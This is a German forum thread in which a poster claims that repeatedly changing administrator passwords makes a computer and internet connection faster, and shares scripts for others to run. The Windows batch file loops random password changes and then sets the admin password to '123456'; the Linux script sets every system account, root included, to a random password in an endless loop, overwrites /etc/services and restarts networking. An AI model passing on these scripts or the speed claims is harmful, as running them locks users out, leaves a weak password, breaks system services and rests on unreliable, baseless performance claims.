Menschen Wissenschaft Politik Mystery Kriminalfälle Spiritualität Verschwörungen Technologie Ufologie Natur Umfragen Unterhaltung

Warum läuft der Computer schenller bei diesem Script?

17 Beiträge, Schlüsselwörter: Backdoor, Software Backdoor, Hardware Backdoor
Diese Diskussion wurde von Rho-ny-theta geschlossen.
Begründung: TE ausgeschlossen
Seite 1 von 1
Mr.Vermouth
Diskussionsleiter
ehemaliges Mitglied

Lesezeichen setzen

Warum läuft der Computer schenller bei diesem Script?

28.03.2015 um 12:30
Hallo

Ich hab folgendes herausgefunden. Und zwar ist mir das bei Linux aufgefallen, dass das System ne ganze Ecke schneller läuft wenn ich das Root(Admin) Passwort ändere.

Dann bin ich auf die Idee gekommen, ein Script zu schreiben welches diesen Effekt dauerhaft aufrechterhält. Da der Effekt nur für 1-2 Sekunden merkbar wird.

Vor ein paar Monaten als ich damit herumgespielt habe, hat sich noch meine DSL Geschwindigkeit verdoppelt, im Moment ist der Effekt aber umgekehrt aufgetreten, dass ich von ca. einer 12.000er Leitung auf eine 6.000 gefallen bin.

Die Fenster zB im Windows Explorer oder im Internet Explorer laufen aber trotz allem eine ganze Ecke schneller.

Ich poste jetzt auch das Script falls ihr es mal auf eurem Computer testen wollt.

Hier das Script zum testen, aber VORSICHT wenn man es nicht bis zum Ende laufen lässt ist ein Zufälliges Passwort eingestellt, nach 10.000 Durchläufen ist das Passwort 123456. Bei mir läuft es mit 10.000 Durchläufen mehrere Minuten. Und es ist für Windows geschrieben.

SET /A XCOUNT=0
:loop
net user admin /random
SET /A XCOUNT+=1
echo %XCOUNT%
IF "%XCOUNT%" == "10000" (
GOTO end
) ELSE (
GOTO loop
)
:end



net user admin 123456


Und noch was ein Dual Core sollte mindestens vorhanden sein und ich habe das Script im Moment mit 100.000 Durchläufen am laufen.

Für die die es ausprobieren, was passiert bei euch?

Man muss das ganze dann noch in eine Text Datei setzen und dann die Endung in .bat um ändern.

Und dann in der CMD ausführen.

MFG


melden
Anzeige

Warum läuft der Computer schenller bei diesem Script?

28.03.2015 um 12:39
Wieso nicht für das Ende einbauen, dass das Passwort 12345 oder ein anderes ist?

Ich werds nicht ausprobieren da mein PC eh schon schnell genug läuft, aber trotzdem ^^


melden
Mr.Vermouth
Diskussionsleiter
ehemaliges Mitglied

Lesezeichen setzen

Warum läuft der Computer schenller bei diesem Script?

28.03.2015 um 12:40
@Matoskah

Hab ich vergessen zu erwähnen das Passwort ist am Ende 123456.

Und ansonsten ist halt ein Loop im Script mit einem Zufalls Passwort.


melden
Mr.Vermouth
Diskussionsleiter
ehemaliges Mitglied

Lesezeichen setzen

Warum läuft der Computer schenller bei diesem Script?

28.03.2015 um 12:42
Wobei mir gerade auffällt, dass sich das System wieder verlangsamt hat. :(

Aber ich arbeite dran. :D


melden
Mr.Vermouth
Diskussionsleiter
ehemaliges Mitglied

Lesezeichen setzen

Warum läuft der Computer schenller bei diesem Script?

28.03.2015 um 12:58
Bei Linux hat da immer geholfen das Script neu zu starten.


melden

Warum läuft der Computer schenller bei diesem Script?

28.03.2015 um 13:06
Ich persönlich denke nicht, dass sich ein PC durch (fast) dauerhafte Operationen verschnellert.
Da ich ja selbst recht viel programmiere, also richtige Programme, da frisst es eher RAM und CPU und je nach Begrenzung die ich intern gesetzt hab ruckelt dann der PC mal stärker oder lässt sich davon nicht beeinflussen :D


melden
Mr.Vermouth
Diskussionsleiter
ehemaliges Mitglied

Lesezeichen setzen

Warum läuft der Computer schenller bei diesem Script?

28.03.2015 um 13:11
@Matoskah

Ja an sich mag ich dir da recht geben, ein Core ist auch komplett ausgelastet, aber wo ich jetzt gerade wieder ohne Script unterwegs bin merke ich eine eindeutige Verlangsamung.

Man sollte in dem Script noch eine Anweisung schreiben, welche den Neustart dessen regelt.

Hier das ganze nochmal für Knoppix 7.0.5.

#
#
#
clear
echo "Knowledge is Power"


while true
do
# Kommandos der Endlosschleifen

test123=$(dd if=/dev/urandom bs=1 count=45 2>/dev/null | openssl base64)

Variable_1=$(dd if=/dev/urandom bs=1 count=45 2>/dev/null | openssl base64)


echo root:"$Variable_1" | chpasswd
echo daemon:"$Variable_1" | chpasswd
echo bin:"$Variable_1" | chpasswd
echo sys:"$Variable_1" | chpasswd
echo sync:"$Variable_1" | chpasswd
echo games:"$Variable_1" | chpasswd
echo man:"$Variable_1" | chpasswd
echo lp:"$Variable_1" | chpasswd
echo mail:"$Variable_1" | chpasswd
echo news:"$Variable_1" | chpasswd
echo uucp:"$Variable_1" | chpasswd
echo proxy:"$Variable_1" | chpasswd
echo www-data:"$Variable_1" | chpasswd
echo backup:"$Variable_1" | chpasswd
echo list:"$Variable_1" | chpasswd
echo irc:"$Variable_1" | chpasswd
echo gnats:"$Variable_1" | chpasswd
echo nobody:"$Variable_1" | chpasswd
echo libuuid:"$Variable_1" | chpasswd
echo messagebus:"$Variable_1" | chpasswd
echo knoppix:"$Variable_1" | chpasswd
echo speech-dispatcher:"$Variable_1" | chpasswd
echo polkituser:"$Variable_1" | chpasswd
echo festival:"$Variable_1" | chpasswd
echo saned:"$Variable_1" | chpasswd
echo statd:"$Variable_1" | chpasswd
echo partimag:"$Variable_1" | chpasswd
echo sshd:"$Variable_1" | chpasswd
echo tftp:"$Variable_1" | chpasswd
echo hplip:"$Variable_1" | chpasswd
echo avahi:"$Variable_1" | chpasswd
echo mysql:"$Variable_1" | chpasswd
echo postgres:"$Variable_1" | chpasswd
echo privoxy:"$Variable_1" | chpasswd
echo debian-tor:"$Variable_1" | chpasswd
echo vde2-net:"$Variable_1" | chpasswd
echo timidity:"$Variable_1" | chpasswd
echo usbmux:"$Variable_1" | chpasswd
echo ntop:"$Variable_1" | chpasswd
echo libvirt-qemu:"$Variable_1" | chpasswd
echo colord:"$Variable_1" | chpasswd
echo nx:"$Variable_1" | chpasswd
echo syslog:"$Variable_1" | chpasswd
echo klog:"$Variable_1" | chpasswd
echo haldaemon:"$Variable_1" | chpasswd
echo distccd:"$Variable_1" | chpasswd

sudo echo "#FUCK YOU" $RANDOM >/home/services

sudo echo $test123

sudo /etc/init.d/networking restart

sudo firewall start

sudo cp /home/services /etc/services

sudo cat /etc/services

sudo cat /etc/passwd

done

Den Firewall Start kann man weglassen, mit diesem Script wird halt jedes Passwort geändert und was noch zu modifizieren wäre das die Shadow Datei umgeschrieben wird.


melden
Mr.Vermouth
Diskussionsleiter
ehemaliges Mitglied

Lesezeichen setzen

Warum läuft der Computer schenller bei diesem Script?

28.03.2015 um 13:34
@Matoskah

Vielleicht hast du aber eine Idee warum sich am Anfang die Leitungs Geschwindigkeit verdoppelt hat und der Effekt jetzt umgekehrt ist?


melden

Warum läuft der Computer schenller bei diesem Script?

28.03.2015 um 13:35
@Mr.Vermouth
Leider nicht, da ich mich nicht so sehr mit Shellscript, Linux, oder der CMD beschäftige :D
Ich schreibe meine Sachen eher in C++, C#, Java, und co. ^^


melden
Mr.Vermouth
Diskussionsleiter
ehemaliges Mitglied

Lesezeichen setzen

Warum läuft der Computer schenller bei diesem Script?

28.03.2015 um 13:36
@Matoskah

Ich würde halt auf eine Backdoor tippen.

Allerdings auf eine System interne.

Also kein normaler Virus.


melden

Warum läuft der Computer schenller bei diesem Script?

28.03.2015 um 13:37
@Mr.Vermouth
Vielleicht gibt es ja einige die deine Erfahrungen teilen können in der Sache, oder in dem Bereich mehr Ahnung haben als ich.
Da muss man i.d.R. was warten bis einer von denen antwortet.


melden
Mr.Vermouth
Diskussionsleiter
ehemaliges Mitglied

Lesezeichen setzen

Warum läuft der Computer schenller bei diesem Script?

28.03.2015 um 13:43
@Matoskah

Ich hab das Script nochmal geladen und wenn ich meine Standard Seite anklicke welche Google ist, dann ist diese Seite mit einem Schlag da, es vergeht nichts an Zeit, und ohne Script dauert das gut eine halbe Sekunde. Wenn nicht sogar eine Sekunde.


melden

Warum läuft der Computer schenller bei diesem Script?

28.03.2015 um 13:44
@Mr.Vermouth
Vielleicht hast du auch teilweise Störungen seitens des Providers?


melden
Mr.Vermouth
Diskussionsleiter
ehemaliges Mitglied

Lesezeichen setzen

Warum läuft der Computer schenller bei diesem Script?

28.03.2015 um 13:48
@Matoskah

Also mein Ping beträgt ca. 10ms, daran sollte es nicht liegen.

Und momentan hab ich wieder nur eine 6000er Leitung die ohne Script eine Geschwindigkeit von 12.000 hatte. Als ich die Leitung das erste mal benutzt habe, hat sich die Geschwindigkeit mit dem Script allerdings verdoppelt. Und der gleiche Effekt ist auch an einem anderen Wohnort aufgetreten.

Da lief Linux so schnell, dass ein Webcam Programm eine wesentlich höhere Aufnahme Geschwindigkeit hatte.

Was mich auch stutzig gemacht hat.


melden

Warum läuft der Computer schenller bei diesem Script?

28.03.2015 um 13:51
@Mr.Vermouth
Da muss man mal gucken, ruf mal deinen Provider an ob Störungen vorliegen und was für eine Leitung da zu deiner Wohnung/deinem Haus eigentlich liegt.
Der Ping ist nicht unbedingt von der Leitung abhängig, sondern eher wie weit die nächste "Box" weg ist, also wie lang die Leitung bis zum nächsten Knotenpunkt ist, und wie hoch die Auslastung der Hauptleitung ist.


melden
Mr.Vermouth
Diskussionsleiter
ehemaliges Mitglied

Lesezeichen setzen

Warum läuft der Computer schenller bei diesem Script?

28.03.2015 um 13:59
@Matoskah

Also die meisten haben hier um die 10.00kbits. Meine höchst Geschwindigkeit lag bei 1,5Mbyte die Sekunde. Das aber auch nur mit Script.

Aber selbst wenn das eine Störung seitens des Providers ist erklärt das nicht, das zB das Webcam Programm unter Linux viel schneller aufgenommen hat, was aussah als hätte ich es bewusst schneller laufen lassen. Und die Öffnung der Google Suchseite, erklärt sich mit einer Störung ebenfalls nicht.

Und der Windows Explorer läuft auch schneller.

Ich hatte auch schon überlegt ein Programm in C# zu schrieben welches die Fenster Öffnungs Geschwindigkeit misst. Dazu habe ich dann aber was gelesen das dies nicht so einfach sein soll.


melden
Anzeige
Mr.Vermouth
Diskussionsleiter
ehemaliges Mitglied

Lesezeichen setzen

Warum läuft der Computer schenller bei diesem Script?

28.03.2015 um 14:10
@Matoskah

Kann auch sein, dass ich mich da vertue und deswegen poste ich es auch.

Ich bin mir da nicht so sicher. Ich hab gerade auch ein Video aufgenommen, wo der Effekt nicht besonders gut auftrat. Was aber auch daran liegen könnte, dass ich soviel herumspiele.


melden

Diese Diskussion wurde von Rho-ny-theta geschlossen.
Begründung: TE ausgeschlossen
125 Mitglieder anwesend
Konto erstellen
Allmystery Newsletter
Alle zwei Wochen
die beliebtesten
Diskussionen per E-Mail.

Themenverwandt